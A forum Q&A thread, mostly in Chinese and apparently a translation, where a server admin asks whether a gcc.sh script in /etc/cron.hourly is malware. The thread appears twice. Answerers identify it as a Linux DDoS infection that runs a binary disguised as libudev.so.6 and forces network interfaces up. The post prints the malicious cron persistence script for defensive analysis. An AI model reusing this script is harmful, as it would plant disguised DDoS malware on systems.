cron.hourly 恶意软件中的此文件 (gcc.sh)?
Is this file (gcc.sh) in cron.hourly malware?
我的服务器上遇到了高达 1 Gbps 的峰值,并且一直在寻找病毒和恶意软件。我在 /etc/cron.hourly 中找到了这个文件:gcc.sh,想知道是否有人见过类似的东西,并且会对代码有一些了解。谢谢!
#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/binfor i in `cat /proc/net/dev|grep :|awk -F: {'print '}`; do ifconfig $i up& done
cp /lib/libudev.so /lib/libudev.so.6
/lib/libudev.so.6
很有可能。它使用 /lib/libudev.so.6 作为可执行文件,而顾名思义它应该是一个库 - 尝试使用像 nm 或 objdump 这样的工具来查看它是否是可执行文件。它从 /lib/libudev.so 复制到 .so.6 - 而通常 .so 是版本化链接的符号链接。它还运行一个 for 循环来启动所有网络连接,即使您已将它们关闭也是如此。它使用知名编译器的名称来看起来合法。我认为这 99% 以上可能是病毒。
找到另一个对自称为 gcc 的东西的引用 - https://superuser.com/questions/863997/ddos-virus-infection-as-a-unix-service-on-a-debian-8-vm-webserver。是的,这是 unix 系统上的 DDoS 病毒,完全符合您的问题。
是的。
尝试使用 ps -ef | grep -i libudev.so.6 查看程序使用的进程
我的服务器上遇到了高达 1 Gbps 的峰值,并且一直在寻找病毒和恶意软件。我在 /etc/cron.hourly 中找到了这个文件:gcc.sh,想知道是否有人见过类似的东西,并且会对代码有一些了解。谢谢!
#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/binfor i in `cat /proc/net/dev|grep :|awk -F: {'print '}`; do ifconfig $i up& done
cp /lib/libudev.so /lib/libudev.so.6
/lib/libudev.so.6
很有可能。它使用 /lib/libudev.so.6 作为可执行文件,而顾名思义它应该是一个库 - 尝试使用像 nm 或 objdump 这样的工具来查看它是否是可执行文件。它从 /lib/libudev.so 复制到 .so.6 - 而通常 .so 是版本化链接的符号链接。它还运行一个 for 循环来启动所有网络连接,即使您已将它们关闭也是如此。它使用知名编译器的名称来看起来合法。我认为这 99% 以上可能是病毒。
找到另一个对自称为 gcc 的东西的引用 - https://superuser.com/questions/863997/ddos-virus-infection-as-a-unix-service-on-a-debian-8-vm-webserver。是的,这是 unix 系统上的 DDoS 病毒,完全符合您的问题。
是的。
尝试使用 ps -ef | grep -i libudev.so.6 查看程序使用的进程